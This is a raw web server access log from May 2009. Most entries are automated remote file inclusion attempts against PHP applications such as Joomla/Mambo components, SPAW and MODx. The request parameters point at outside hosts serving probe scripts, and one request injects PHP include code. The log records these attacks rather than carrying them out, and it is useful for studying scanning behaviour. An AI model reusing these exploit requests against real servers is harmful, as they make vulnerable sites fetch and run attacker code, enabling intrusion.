77.232.66.198 - - [14/May/2009:06:47:33 -0500] "GET /logs/access_log.1235347200/main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
77.232.66.198 - - [14/May/2009:06:47:34 -0500] "GET /logs/access_log.1235347200/main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:06:48:54 -0500] "GET /main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:06:48:54 -0500] "GET /logs/access_log.1236384000/main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:06:48:54 -0500] "GET /logs/main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:06:48:55 -0500] "GET /logs/main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:06:48:55 -0500] "GET /main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:06:48:55 -0500] "GET /logs/access_log.1236384000/main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:06:49:07 -0500] "GET /logs/access_log.1230076800 HTTP/1.1" 200 80990 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.120.90.222 - - [14/May/2009:06:49:23 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
199.120.90.222 - - [14/May/2009:06:49:24 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
219.85.63.226 - - [14/May/2009:06:49:34 -0500] "GET /logs/access_log.1235347200/main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
219.85.63.226 - - [14/May/2009:06:49:35 -0500] "GET /logs/access_log.1235347200/main.php?pagina=http://boisetraffic.com/images/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
209.175.180.194 - - [14/May/2009:06:50:08 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
209.175.180.194 - - [14/May/2009:06:50:08 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
199.120.90.222 - - [14/May/2009:06:50:09 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
199.120.90.222 - - [14/May/2009:06:50:09 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
209.175.180.194 - - [14/May/2009:06:50:40 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
209.175.180.194 - - [14/May/2009:06:50:40 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hetjongeschaap.nl/site/images/response.txt????? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
222.239.76.25 - - [14/May/2009:06:50:58 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:06:50:58 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:06:50:58 -0500] "GET /?DOCUMENT_ROOT=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:06:51:00 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 200 189317 "-""Mozilla/5.0"
75.127.68.192 - - [14/May/2009:06:55:24 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
75.127.68.192 - - [14/May/2009:06:55:24 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
69.94.30.156 - - [14/May/2009:06:55:41 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:06:55:41 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
67.15.177.55 - - [14/May/2009:06:56:35 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.15.177.55 - - [14/May/2009:06:56:35 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.15.177.55 - - [14/May/2009:06:56:35 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:06:57:33 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:06:57:33 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
203.22.204.90 - - [14/May/2009:06:57:34 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 332 "-""libwww-perl/5.76"
203.22.204.90 - - [14/May/2009:06:57:34 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 327 "-""libwww-perl/5.76"
217.18.76.16 - - [14/May/2009:06:57:37 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:06:57:37 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
219.94.148.39 - - [14/May/2009:06:58:44 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:06:58:44 -0500] "GET /logs/access_log.1238457600/components/com_simpleboard/image_upload.php?sbp=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:06:58:44 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:06:59:30 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:06:59:30 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:06:59:30 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:06:59:45 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
203.22.204.193 - - [14/May/2009:07:01:06 -0500] "GET /logs/home.php?index=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.76"
203.22.204.193 - - [14/May/2009:07:01:06 -0500] "GET /home.php?index=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.76"
203.22.204.193 - - [14/May/2009:07:01:16 -0500] "GET /logs/home.php?index=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.76"
203.22.204.193 - - [14/May/2009:07:01:16 -0500] "GET /home.php?index=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.76"
66.225.211.159 - - [14/May/2009:07:01:19 -0500] "GET /logs/access_log.1236384000/main.php?pagina=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:07:01:19 -0500] "GET /main.php?pagina=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:07:01:19 -0500] "GET /logs/main.php?pagina=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:07:01:22 -0500] "GET /main.php?pagina=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:07:01:22 -0500] "GET /logs/main.php?pagina=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:07:01:22 -0500] "GET /logs/access_log.1236384000/main.php?pagina=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:07:01:26 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.foolsofoz.com//rox.gif?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:07:01:26 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.foolsofoz.com//rox.gif?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
66.225.211.159 - - [14/May/2009:07:01:37 -0500] "GET /main.php?pagina=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:07:01:37 -0500] "GET /logs/main.php?pagina=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:07:01:56 -0500] "GET /logs/access_log.1236384000/main.php?pagina=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:07:01:59 -0500] "GET /logs/access_log.1235347200/main.php?pagina=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:07:02:03 -0500] "GET /logs/access_log.1235347200/main.php?pagina=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:07:02:18 -0500] "GET /logs/access_log.1235347200/main.php?pagina=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:02:40 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:02:40 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:02:40 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:07:03:29 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:07:03:29 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:07:03:29 -0500] "GET /logs/access_log.1239926400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:04:02 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:07:04:22 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:07:04:23 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:07:04:35 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:07:04:35 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:07:04:37 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
121.165.73.157 - - [14/May/2009:07:04:37 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.gdiscount.fr///modules/ab.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
196.40.83.75 - - [14/May/2009:07:05:07 -0500] "GET /logs//index.php?url=http://www.cluboftraders.de/impex/kontol.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
196.40.83.75 - - [14/May/2009:07:05:08 -0500] "GET //index.php?url=http://www.cluboftraders.de/impex/kontol.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
206.221.215.41 - - [14/May/2009:07:05:50 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:05:52 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
206.221.215.41 - - [14/May/2009:07:05:53 -0500] "GET /logs/access_log.1239926400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.15.177.55 - - [14/May/2009:07:06:23 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.7.201.86 - - [14/May/2009:07:06:34 -0500] "GET /logs//?DOCUMENT_ROOT=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 200 189322 "-""libwww-perl/5.826"
66.7.201.86 - - [14/May/2009:07:06:34 -0500] "GET //?DOCUMENT_ROOT=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.826"
66.7.201.86 - - [14/May/2009:07:06:35 -0500] "GET /logs//?DOCUMENT_ROOT=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 200 189322 "-""libwww-perl/5.826"
66.7.201.86 - - [14/May/2009:07:06:35 -0500] "GET //?DOCUMENT_ROOT=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.826"
87.98.222.18 - - [14/May/2009:07:06:48 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:07:06:48 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:07:06:48 -0500] "GET /logs/access_log.1238630400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:07:07:01 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.foolsofoz.com//rox.gif?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:07:07:01 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.foolsofoz.com//rox.gif?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
203.22.204.90 - - [14/May/2009:07:07:26 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.76"
203.22.204.90 - - [14/May/2009:07:07:27 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 330 "-""libwww-perl/5.76"
75.127.68.192 - - [14/May/2009:07:07:29 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
75.127.68.192 - - [14/May/2009:07:07:30 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
66.249.67.180 - - [14/May/2009:07:07:59 -0500] "GET /logs/access_log.1131408000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.234.41.5 - - [14/May/2009:07:09:14 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
201.234.41.5 - - [14/May/2009:07:09:15 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
148.243.72.112 - - [14/May/2009:07:10:13 -0500] "GET /logs/access_log.1238976000/joomla/index.php?option=com_restaurante&task=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:07:10:13 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:07:10:13 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:07:10:13 -0500] "GET /logs/access_log.1239494400/joomla/index.php?option=com_restaurante&task=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:07:10:18 -0500] "GET /logs/access_log.1120867200 HTTP/1.1" 200 464 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.22.204.90 - - [14/May/2009:07:10:25 -0500] "GET /logs//admin/index.php?_shop_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 304 "-""libwww-perl/5.76"
203.22.204.90 - - [14/May/2009:07:10:25 -0500] "GET //admin/index.php?_shop_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
148.243.72.112 - - [14/May/2009:07:10:26 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:07:10:46 -0500] "GET /logs/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:07:10:46 -0500] "GET /errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:07:10:46 -0500] "GET /logs/access_log.1240185600/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:07:10:46 -0500] "GET /logs/access_log.1238630400/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.94.30.156 - - [14/May/2009:07:10:47 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:07:10:47 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
208.64.202.134 - - [14/May/2009:07:10:48 -0500] "GET /errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:07:10:48 -0500] "GET /logs/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:07:10:48 -0500] "GET /logs/access_log.1240185600/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:07:10:49 -0500] "GET /logs/access_log.1238630400/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:07:12:05 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:07:12:05 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.0.55.34 - - [14/May/2009:07:12:05 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
65.55.208.139 - - [14/May/2009:07:12:13 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [14/May/2009:07:12:13 -0500] "GET /logs/access_log.1221782400 HTTP/1.1" 200 1996 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
124.0.55.34 - - [14/May/2009:07:13:05 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:07:14:57 -0500] "GET /logs/access_log.1238025600//skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:07:14:57 -0500] "GET //skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:07:14:57 -0500] "GET /logs//skin/zero_vote/error.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.249.67.180 - - [14/May/2009:07:15:28 -0500] "GET /logs/access_log.1107388800 HTTP/1.1" 200 248 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.240.12.4 - - [14/May/2009:07:15:33 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.mjswimgear.dk/joomla//logs/idv6.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
210.240.12.4 - - [14/May/2009:07:15:33 -0500] "GET ///vwar/backup/errors.php?error=http://www.mjswimgear.dk/joomla//logs/idv6.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
75.127.68.192 - - [14/May/2009:07:15:45 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.810"
75.127.68.192 - - [14/May/2009:07:15:46 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
87.98.222.18 - - [14/May/2009:07:16:15 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:07:16:15 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:07:16:15 -0500] "GET /logs/access_log.1239926400//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:07:16:44 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
87.98.222.18 - - [14/May/2009:07:16:44 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://pacificdecor.org/vnc/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
